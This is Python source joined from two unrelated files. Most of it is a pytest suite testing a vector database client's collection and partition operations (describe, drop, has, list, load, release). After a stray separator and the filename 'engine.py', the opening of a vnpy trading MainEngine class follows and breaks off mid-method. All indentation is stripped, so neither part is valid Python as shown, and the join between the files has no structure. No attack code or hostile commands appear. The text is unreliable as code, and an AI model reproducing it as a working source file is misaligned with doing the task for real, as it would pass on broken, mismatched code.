def get_filter_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_single_vector_fields()
)
def get_vector_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
logging.getLogger().info(request.param)
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return request.param
"""
******************************************************************
The following cases are used to test `describe_collection` function, no data in collection
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_collection_fields(self, connect, get_filter_field, get_vector_field):
"""
target: test create normal collection with different fields, check info returned
method: create collection with diff fields: metric/field_type/..., calling `describe_collection`
expected: no exception raised, and value returned correct
"""
filter_field = get_filter_field
vector_field = get_vector_field
collection_name = gen_unique_str(uid_describe)
fields = {
"fields": [gen_primary_field(), filter_field, vector_field],
# "segment_row_limit": default_segment_row_limit
}
connect.create_collection(collection_name, fields)
res = connect.describe_collection(collection_name)
# assert res['segment_row_limit'] == default_segment_row_limit
assert len(res["fields"]) == len(fields.get("fields"))
for field in res["fields"]:
if field["type"] == filter_field:
assert field["name"] == filter_field["name"]
elif field["type"] == vector_field:
assert field["name"] == vector_field["name"]
assert field["params"] == vector_field["params"]
@pytest.mark.tags(CaseLabel.L0)
def test_describe_collection_after_index_created(self, connect, collection, get_simple_index):
connect.create_index(collection, default_float_vec_field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
assert index["index_type"] == get_simple_index["index_type"]
assert index["metric_type"] == get_simple_index["metric_type"]
assert index["params"] == get_simple_index["params"]
@pytest.mark.tags(CaseLabel.L2)
def test_describe_collection_without_connection(self, collection, dis_connect):
"""
target: test get collection info, without connection
method: calling get collection info with correct params, with a disconnected instance
expected: get collection info raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.describe_collection(collection)
@pytest.mark.tags(CaseLabel.L0)
def test_describe_collection_not_existed(self, connect):
"""
target: test if collection not created
method: random a collection name, create this collection then drop it,
assert the value returned by describe_collection method
expected: False
"""
collection_name = gen_unique_str(uid_describe)
connect.create_collection(collection_name, cons.default_fields)
connect.describe_collection(collection_name)
connect.drop_collection(collection_name)
try:
connect.describe_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DescribeCollection failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L2)
def test_describe_collection_multithread(self, connect):
"""
target: test create collection with multi-thread
method: create collection using multi-thread,
expected: collections are created
"""
threads_num = 4
threads = []
collection_name = gen_unique_str(uid_describe)
connect.create_collection(collection_name, cons.default_fields)
def get_info():
connect.describe_collection(collection_name)
for i in range(threads_num):
t = MyThread(target=get_info)
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
"""
******************************************************************
The following cases are used to test `describe_collection` function, and insert data in collection
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_describe_collection_fields_after_insert(self, connect, get_filter_field, get_vector_field):
"""
target: test create normal collection with different fields, check info returned
method: create collection with diff fields: metric/field_type/..., calling `describe_collection`
expected: no exception raised, and value returned correct
"""
filter_field = get_filter_field
vector_field = get_vector_field
collection_name = gen_unique_str(uid_describe)
fields = {
"fields": [gen_primary_field(), filter_field, vector_field],
# "segment_row_limit": default_segment_row_limit
}
connect.create_collection(collection_name, fields)
entities = gen_entities_by_fields(fields["fields"], default_nb, vector_field["params"]["dim"])
res_ids = connect.insert(collection_name, entities)
connect.flush([collection_name])
res = connect.describe_collection(collection_name)
# assert res['segment_row_limit'] == default_segment_row_limit
assert len(res["fields"]) == len(fields.get("fields"))
for field in res["fields"]:
if field["type"] == filter_field:
assert field["name"] == filter_field["name"]
elif field["type"] == vector_field:
assert field["name"] == vector_field["name"]
assert field["params"] == vector_field["params"]
class TestDescribeCollectionInvalid(object):
"""
Test describe collection with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_describe_collection_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test describe collection which name invalid
method: call describe_collection with invalid names
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.describe_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("collection_name", ('', None))
def test_describe_collection_with_empty_or_None_collection_name(self, connect, collection_name):
"""
target: test describe collection which name is empty or None
method: call describe_collection with '' or None name
expected: raise exception
"""
with pytest.raises(Exception) as e:
connect.describe_collection(collection_name)
class TestDropCollection:
"""
******************************************************************
The following cases are used to test `drop_collection` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_drop_collection_A(self, connect, collection):
"""
target: test delete collection created with correct params
method: create collection and then delete,
assert the value returned by delete method
expected: status ok, and no collection in collections
"""
connect.drop_collection(collection)
time.sleep(2)
assert not connect.has_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_drop_collection_without_connection(self, collection, dis_connect):
"""
target: test describe collection, without connection
method: drop collection with correct params, with a disconnected instance
expected: drop raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.drop_collection(collection)
@pytest.mark.tags(CaseLabel.L0)
def test_drop_collection_not_existed(self, connect):
"""
target: test if collection not created
method: random a collection name, which not existed in db,
assert the exception raised returned by drp_collection method
expected: False
"""
collection_name = gen_unique_str(uid_drop)
try:
connect.drop_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DescribeCollection failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L2)
def test_create_drop_collection_multithread(self, connect):
"""
target: test create and drop collection with multi-thread
method: create and drop collection using multi-thread,
expected: collections are created, and dropped
"""
threads_num = 8
threads = []
collection_names = []
def create():
collection_name = gen_unique_str(uid_drop)
collection_names.append(collection_name)
connect.create_collection(collection_name, cons.default_fields)
connect.drop_collection(collection_name)
for i in range(threads_num):
t = MyThread(target=create, args=())
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
for item in collection_names:
assert not connect.has_collection(item)
class TestDropCollectionInvalid(object):
"""
Test has collection with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_drop_collection_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test drop invalid collection
method: drop collection with invalid collection name
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("collection_name", ('', None))
def test_drop_collection_with_empty_or_None_collection_name(self, connect, collection_name):
"""
target: test drop invalid collection
method: drop collection with empty or None collection name
expected: raise exception
"""
with pytest.raises(Exception) as e:
connect.has_collection(collection_name)
class TestHasCollection:
"""
******************************************************************
The following cases are used to test `has_collection` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_without_connection(self, collection, dis_connect):
"""
target: test has collection, without connection
method: calling has collection with correct params, with a disconnected instance
expected: has collection raise exception
"""
with pytest.raises(Exception) as e:
assert dis_connect.has_collection(collection)
@pytest.mark.tags(CaseLabel.L0)
def test_has_collection_not_existed(self, connect):
"""
target: test if collection not created
method: random a collection name, create this collection then drop it,
assert the value returned by has_collection method
expected: False
"""
collection_name = gen_unique_str(uid_has)
connect.create_collection(collection_name, cons.default_fields)
assert connect.has_collection(collection_name)
connect.drop_collection(collection_name)
assert not connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_multithread(self, connect):
"""
target: test create collection with multi-thread
method: create collection using multi-thread,
expected: collections are created
"""
threads_num = 4
threads = []
collection_name = gen_unique_str(uid_has)
connect.create_collection(collection_name, cons.default_fields)
def has():
assert connect.has_collection(collection_name)
# assert not assert_collection(connect, collection_name)
for i in range(threads_num):
t = MyThread(target=has, args=())
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
class TestHasCollectionInvalid(object):
"""
Test has collection with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test list collections with invalid scenario
method: show collection with invalid collection name
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_with_empty_collection_name(self, connect):
"""
target: test list collections with invalid scenario
method: show collection with empty collection name
expected: raise exception
"""
collection_name = ''
with pytest.raises(Exception) as e:
connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_with_none_collection_name(self, connect):
"""
target: test list collections with invalid scenario
method: show collection with no collection name
expected: raise exception
"""
collection_name = None
with pytest.raises(Exception) as e:
connect.has_collection(collection_name)
class TestListCollections:
"""
******************************************************************
The following cases are used to test `list_collections` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_list_collections_multi_collections(self, connect):
"""
target: test list collections
method: create collection, assert the value returned by list_collections method
expected: True
"""
collection_num = 50
collection_names = []
for i in range(collection_num):
collection_name = gen_unique_str(uid_list)
collection_names.append(collection_name)
connect.create_collection(collection_name, cons.default_fields)
assert collection_name in connect.list_collections()
for i in range(collection_num):
connect.drop_collection(collection_names[i])
@pytest.mark.tags(CaseLabel.L2)
def test_list_collections_without_connection(self, dis_connect):
"""
target: test list collections, without connection
method: calling list collections with correct params, with a disconnected instance
expected: list collections raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.list_collections()
# TODO: make sure to run this case in the end
@pytest.mark.skip("r0.3-test")
@pytest.mark.tags(CaseLabel.L2)
def test_list_collections_no_collection(self, connect):
"""
target: test show collections is correct or not, if no collection in db
method: delete all collections,
assert the value returned by list_collections method is equal to []
expected: the status is ok, and the result is equal to []
"""
result = connect.list_collections()
if result:
for collection_name in result:
assert connect.has_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_list_collections_multithread(self, connect):
"""
target: test list collection with multi-threads
method: list collection using multi-threads
expected: list collections correctly
"""
threads_num = 10
threads = []
collection_name = gen_unique_str(uid_list)
connect.create_collection(collection_name, cons.default_fields)
def _list():
assert collection_name in connect.list_collections()
for i in range(threads_num):
t = MyThread(target=_list)
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
class TestLoadCollection:
"""
******************************************************************
The following cases are used to test `load_collection` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
return request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_binary_index(self, request, connect):
return request.param
@pytest.mark.tags(CaseLabel.L0)
def test_load_collection_after_index(self, connect, collection, get_simple_index):
"""
target: test load collection, after index created
method: insert and create index, load collection with correct params
expected: no error raised
"""
connect.insert(collection, cons.default_entities)
connect.flush([collection])
connect.create_index(collection, default_float_vec_field_name, get_simple_index)
connect.load_collection(collection)
connect.release_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_after_index_binary(self, connect, binary_collection, get_binary_index):
"""
target: test load binary_collection, after index created
method: insert and create index, load binary_collection with correct params
expected: no error raised
"""
result = connect.insert(binary_collection, cons.default_binary_entities)
assert len(result.primary_keys) == default_nb
connect.flush([binary_collection])
for metric_type in binary_metrics():
get_binary_index["metric_type"] = metric_type
connect.drop_index(binary_collection, default_binary_vec_field_name)
if get_binary_index["index_type"] == "BIN_IVF_FLAT" and metric_type in structure_metrics():
with pytest.raises(Exception) as e:
connect.create_index(binary_collection, default_binary_vec_field_name, get_binary_index)
else:
connect.create_index(binary_collection, default_binary_vec_field_name, get_binary_index)
index = connect.describe_index(binary_collection, "")
create_target_index(get_binary_index, default_binary_vec_field_name)
assert index == get_binary_index
connect.load_collection(binary_collection)
connect.release_collection(binary_collection)
@pytest.mark.tags(CaseLabel.L0)
def test_load_empty_collection(self, connect, collection):
"""
target: test load an empty collection with no data inserted
method: no entities in collection, load and release the collection
expected: load and release successfully
"""
connect.load_collection(collection)
connect.release_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_dis_connect(self, dis_connect, collection):
"""
target: test load collection, without connection
method: load collection with correct params, with a disconnected instance
expected: load raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.load_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_release_collection_dis_connect(self, dis_connect, collection):
"""
target: test release collection, without connection
method: release collection with correct params, with a disconnected instance
expected: release raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.release_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_not_existed(self, connect, collection):
"""
target: test load invalid collection
method: load not existed collection
expected: raise exception
"""
collection_name = gen_unique_str(uid_load)
try:
connect.load_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DescribeCollection failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L2)
def test_release_collection_not_existed(self, connect, collection):
"""
target: test release a not existed collection
method: release with a not existed collection name
expected: raise exception
"""
collection_name = gen_unique_str(uid_load)
try:
connect.release_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DescribeCollection failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L0)
def test_release_collection_not_load(self, connect, collection):
"""
target: test release collection without load
method: release collection without load
expected: release successfully
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.release_collection(collection)
@pytest.mark.tags(CaseLabel.L0)
def test_load_collection_after_load_release(self, connect, collection):
"""
target: test load collection after load and release
method: 1.load and release collection after entities flushed
2.re-load collection
expected: No exception
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.release_collection(collection)
connect.load_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_repeatedly(self, connect, collection):
"""
target: test load collection repeatedly
method: load collection twice
expected: No exception
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.load_collection(collection)
@pytest.mark.tags(CaseLabel.L2)
def test_load_release_collection(self, connect, collection):
"""
target: test load, release non-exist collection
method: 1. load, release and drop collection
2. load and release dropped collection
expected: raise exception
"""
collection_name = gen_unique_str(uid_load)
connect.create_collection(collection_name, cons.default_fields)
connect.insert(collection_name, cons.default_entities)
connect.flush([collection_name])
connect.load_collection(collection_name)
connect.release_collection(collection_name)
connect.drop_collection(collection_name)
try:
connect.load_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DescribeCollection failed: can't find collection: %s" % collection_name
try:
connect.release_collection(collection_name)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DescribeCollection failed: can't find collection: %s" % collection_name
@pytest.mark.tags(CaseLabel.L0)
def test_release_collection_after_drop(self, connect, collection):
"""
target: test release collection after drop
method: insert and flush, then release collection after load and drop
expected: raise exception
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.drop_collection(collection)
try:
connect.release_collection(collection)
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DescribeCollection failed: can't find collection: %s" % collection
@pytest.mark.tags(CaseLabel.L0)
def test_load_collection_without_flush(self, connect, collection):
"""
target: test load collection without flush
method: insert entities without flush, then load collection
expected: No exception and data can be queried
"""
result = connect.insert(collection, gen_entities(100))
assert len(result.primary_keys) == 100
connect.load_collection(collection)
int_field_name = "int64"
term_expr = f'{int_field_name} in {result.primary_keys[:1]}'
res = connect.query(collection, term_expr)
assert res == [{int_field_name: result.primary_keys[0]}]
# TODO
@pytest.mark.tags(CaseLabel.L2)
def _test_load_collection_larger_than_memory(self):
"""
target: test load collection when memory less than collection size
method: i don't know
expected: raise exception
"""
@pytest.mark.tags(CaseLabel.L0)
def test_load_collection_release_part_partitions(self, connect, collection):
"""
target: test release part partitions after load collection
method: load collection and release part partitions
expected: released partitions search empty
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.release_partitions(collection, [default_tag])
with pytest.raises(Exception) as e:
connect.search(collection, **default_single_query, partition_names=[default_tag])
res = connect.search(collection, **default_single_query, partition_names=[default_partition_name])
assert len(res[0]) == default_top_k
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_release_all_partitions(self, connect, collection):
"""
target: test release all partitions after load collection
method: load collection and release all partitions
expected: search empty
"""
result = connect.insert(collection, cons.default_entities)
assert len(result.primary_keys) == default_nb
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_collection(collection)
connect.release_partitions(collection, [default_partition_name, default_tag])
res = connect.search(collection, **default_single_query)
assert len(res[0]) == 0
@pytest.mark.tags(CaseLabel.L0)
def test_load_partitions_release_collection(self, connect, collection):
"""
target: test release collection after load partitions
method: insert entities into partitions, search empty after load partitions and release collection
expected: search result empty
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
connect.release_collection(collection)
with pytest.raises(Exception):
connect.search(collection, **default_single_query)
class TestReleaseAdvanced:
@pytest.mark.tags(CaseLabel.L0)
def test_release_collection_during_searching(self, connect, collection):
"""
target: test release collection during searching
method: insert entities into collection, flush and load collection, release collection during searching
expected: raise exception
"""
nq = 1000
top_k = 1
connect.insert(collection, cons.default_entities)
connect.flush([collection])
connect.load_collection(collection)
params, _ = gen_search_vectors_params(field_name, cons.default_entities, top_k, nq)
future = connect.search(collection, **params, _async=True)
connect.release_collection(collection)
with pytest.raises(Exception):
connect.search(collection, **default_single_query)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.skip(reason="issue 12259")
def test_release_partition_during_searching(self, connect, collection):
"""
target: test release partition during searching
method: insert entities into partition, flush and load partition, release partition during searching
expected: raise exception
"""
nq = 1000
top_k = 1
connect.create_partition(collection, default_tag)
query, _ = gen_search_vectors_params(field_name, cons.default_entities, top_k, nq)
connect.insert(collection, cons.default_entities, partition_name=default_tag)
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
res = connect.search(collection, **query, _async=True)
connect.release_partitions(collection, [default_tag])
res = connect.search(collection, **default_single_query)
assert len(res[0]) == 0
@pytest.mark.tags(CaseLabel.L0)
def test_release_collection_during_searching_A(self, connect, collection):
"""
target: test release collection during searching
method: insert entities into partition, flush and load partition, release collection during searching
expected: raise exception
"""
nq = 1000
top_k = 1
connect.create_partition(collection, default_tag)
query, _ = gen_search_vectors_params(field_name, cons.default_entities, top_k, nq)
connect.insert(collection, cons.default_entities, partition_name=default_tag)
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
res = connect.search(collection, **query, _async=True)
connect.release_collection(collection)
with pytest.raises(Exception):
connect.search(collection, **default_single_query)
def _test_release_collection_during_loading(self, connect, collection):
"""
target: test release collection during loading
method: insert entities into collection, flush, release collection during loading
expected: raise exception
"""
connect.insert(collection, cons.default_entities)
connect.flush([collection])
def load():
connect.load_collection(collection)
t = threading.Thread(target=load, args=())
t.start()
connect.release_collection(collection)
with pytest.raises(Exception):
connect.search(collection, **default_single_query)
def _test_release_partition_during_loading(self, connect, collection):
"""
target: test release partition during loading
method: insert entities into partition, flush, release partition during loading
expected:
"""
connect.create_partition(collection, default_tag)
connect.insert(collection, cons.default_entities, partition_name=default_tag)
connect.flush([collection])
def load():
connect.load_collection(collection)
t = threading.Thread(target=load, args=())
t.start()
connect.release_partitions(collection, [default_tag])
res = connect.search(collection, **default_single_query)
assert len(res[0]) == 0
def _test_release_collection_during_inserting(self, connect, collection):
"""
target: test release collection during inserting
method: load collection, do release collection during inserting
expected: raise exception
"""
connect.insert(collection, cons.default_entities)
connect.flush([collection])
connect.load_collection(collection)
def insert():
connect.insert(collection, cons.default_entities)
t = threading.Thread(target=insert, args=())
t.start()
connect.release_collection(collection)
with pytest.raises(Exception):
res = connect.search(collection, **default_single_query)
def _test_release_collection_during_indexing(self, connect, collection):
"""
target: test release collection during building index
method: insert and flush, load collection, do release collection during creating index
expected:
"""
pass
def _test_release_collection_during_droping_index(self, connect, collection):
"""
target: test release collection during droping index
method: insert, create index and flush, load collection, do release collection during droping index
expected:
"""
pass
class TestLoadCollectionInvalid(object):
"""
Test load collection with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test load invalid collection
method: load collection with invalid name
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.load_collection(collection_name)
@pytest.mark.tags(CaseLabel.L2)
def test_release_collection_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test release invalid collection
method: release collection with invalid name
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.release_collection(collection_name)
class TestLoadPartition:
"""
******************************************************************
The following cases are used to test `load_collection` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in cpu mode")
return request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_binary_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] in binary_support():
return request.param
else:
pytest.skip("Skip index Temporary")
@pytest.mark.tags(CaseLabel.L0)
def test_load_partition_after_index_binary(self, connect, binary_collection, get_binary_index):
"""
target: test load binary_collection, after index created
method: insert and create index, load binary_collection with correct params
expected: no error raised
"""
connect.create_partition(binary_collection, default_tag)
result = connect.insert(binary_collection, cons.default_binary_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([binary_collection])
for metric_type in binary_metrics():
logging.getLogger().info(metric_type)
get_binary_index["metric_type"] = metric_type
if get_binary_index["index_type"] == "BIN_IVF_FLAT" and metric_type in structure_metrics():
with pytest.raises(Exception) as e:
connect.create_index(binary_collection, default_binary_vec_field_name, get_binary_index)
else:
connect.create_index(binary_collection, default_binary_vec_field_name, get_binary_index)
connect.load_partitions(binary_collection, [default_tag])
@pytest.mark.tags(CaseLabel.L2)
def test_load_collection_dis_connect(self, connect, dis_connect, collection):
"""
target: test load collection, without connection
method: load collection with correct params, with a disconnected instance
expected: load raise exception
"""
connect.create_partition(collection, default_tag)
with pytest.raises(Exception) as e:
dis_connect.load_partitions(collection, [default_tag])
@pytest.mark.tags(CaseLabel.L2)
def test_release_partition_dis_connect(self, connect, dis_connect, collection):
"""
target: test release collection, without connection
method: release collection with correct params, with a disconnected instance
expected: release raise exception
"""
connect.create_partition(collection, default_tag)
connect.load_partitions(collection, [default_tag])
with pytest.raises(Exception) as e:
dis_connect.release_partitions(collection, [default_tag])
@pytest.mark.tags(CaseLabel.L0)
def test_load_partition_not_existed(self, connect, collection):
"""
target: test load partition for invalid scenario
method: load not existed partition
expected: raise exception and report the error
"""
partition_name = gen_unique_str(uid_load)
try:
connect.load_partitions(collection, [partition_name])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % partition_name
@pytest.mark.tags(CaseLabel.L0)
def test_release_partition_not_load(self, connect, collection):
"""
target: test release partition without load
method: release partition without load
expected: raise exception
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.release_partitions(collection, [default_tag])
@pytest.mark.tags(CaseLabel.L2)
def test_load_release_after_drop(self, connect, collection):
"""
target: test load and release partition after drop
method: drop partition and then load and release it
expected: raise exception
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
connect.release_partitions(collection, [default_tag])
connect.drop_partition(collection, default_tag)
try:
connect.load_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % default_tag
try:
connect.release_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % default_tag
@pytest.mark.tags(CaseLabel.L0)
def test_release_partition_after_drop(self, connect, collection):
"""
target: test release collection after drop
method: insert and flush, then release collection after load and drop
expected: raise exception
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
connect.drop_partition(collection, default_tag)
try:
connect.load_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % default_tag
@pytest.mark.tags(CaseLabel.L0)
def test_load_release_after_collection_drop(self, connect, collection):
"""
target: test release collection after drop
method: insert and flush, then release collection after load and drop
expected: raise exception
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, cons.default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
connect.release_partitions(collection, [default_tag])
connect.drop_collection(collection)
try:
connect.load_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DescribeCollection failed: can't find collection: %s" % collection
try:
connect.release_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "DescribeCollection failed: can't find collection: %s" % collection
class TestLoadPartitionInvalid(object):
"""
Test load collection with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_partition_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_load_partition_with_invalid_partition_name(self, connect, collection, get_partition_name):
"""
target: test load invalid partition
method: load partition with invalid partition name
expected: raise exception
"""
partition_name = get_partition_name
with pytest.raises(Exception) as e:
connect.load_partitions(collection, [partition_name])
@pytest.mark.tags(CaseLabel.L2)
def test_release_partition_with_invalid_partition_name(self, connect, collection, get_partition_name):
"""
target: test release invalid partition
method: release partition with invalid partition name
expected: raise exception
"""
partition_name = get_partition_name
with pytest.raises(Exception) as e:
connect.load_partitions(collection, [partition_name])
|
engine.py
|
"""
"""
import logging
from logging import Logger
import smtplib
import os
from abc import ABC
from datetime import datetime
from email.message import EmailMessage
from queue import Empty, Queue
from threading import Thread
from typing import Any, Sequence, Type, Dict, List, Optional
from vnpy.event import Event, EventEngine
from .app import BaseApp
from .event import (
EVENT_TICK,
EVENT_ORDER,
EVENT_TRADE,
EVENT_POSITION,
EVENT_ACCOUNT,
EVENT_CONTRACT,
EVENT_LOG
)
from .gateway import BaseGateway
from .object import (
Direction,
Exchange,
CancelRequest,
LogData,
OrderRequest,
SubscribeRequest,
HistoryRequest,
OrderData,
BarData,
TickData,
TradeData,
PositionData,
AccountData,
ContractData
)
from .setting import SETTINGS
from .utility import get_folder_path, TRADER_DIR
# 专有的logger文件
from .util_logger import setup_logger
class MainEngine:
"""
Acts as the core of VN Trader.
"""
def __init__(self, event_engine: EventEngine = None):
""""""
if event_engine:
self.event_engine: EventEngine = event_engine
else:
self.event_engine = EventEngine()
self.event_engine.start()
self.gateways: Dict[str, BaseGateway] = {}
self.engines: Dict[str, BaseEngine] = {}
self.apps: Dict[str, BaseApp] = {}
self.exchanges: List[Exchange] = []
self.rm_engine = None
self.algo_engine = None
self.rpc_service = None
os.chdir(TRADER_DIR) # Change working directory
self.init_engines() # Initialize function engines
def add_engine(self, engine_class: Any) -> "BaseEngine":
"""
Add function engine.
"""
engine = engine_class(self, self.event_engine)
self.engines[engine.engine_name] = engine
return engine
def add_gateway(self, gateway_class: Type[BaseGateway], gateway_name: str = None) -> BaseGateway:
"""
Add gateway.
"""
if gateway_name:
# 使用指定的gateway_name, 可以区分相同接口不同账号的gateway同时接入
gateway = gateway_class(self.event_engine, gateway_name=gateway_name)
else:
# 缺省使用了接口自己定义的gateway_name
gateway = gateway_class(self.event_engine)
gateway_name = gateway.gateway_name
self.gateways[gateway_name] = gateway
# Add gateway supported exchanges into engine
